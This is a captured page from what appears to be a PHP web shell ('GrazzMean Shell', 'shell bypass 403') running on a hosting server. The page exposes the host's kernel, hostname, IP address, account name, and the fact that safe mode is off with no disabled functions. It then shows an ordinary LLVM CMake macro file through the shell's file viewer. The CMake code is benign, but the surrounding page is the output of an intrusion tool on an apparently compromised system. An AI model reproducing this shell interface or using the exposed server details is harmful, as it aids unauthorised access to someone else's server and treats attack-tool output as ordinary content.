shell bypass 403

GrazzMean Shell

: /lib64/cmake/llvm/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 3.134.245.35
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : AddLLVMDefinitions.cmake
# There is no clear way of keeping track of compiler command-line
# options chosen via `add_definitions', so we need our own method for
# using it on tools/llvm-config/CMakeLists.txt.

# Beware that there is no implementation of remove_llvm_definitions.

macro(add_llvm_definitions)
  # We don't want no semicolons on LLVM_DEFINITIONS:
  foreach(arg ${ARGN})
    if(DEFINED LLVM_DEFINITIONS)
      set(LLVM_DEFINITIONS "${LLVM_DEFINITIONS} ${arg}")
    else()
      set(LLVM_DEFINITIONS ${arg})
    endif()
  endforeach(arg)
  add_definitions( ${ARGN} )
endmacro(add_llvm_definitions)
© 2025 GrazzMean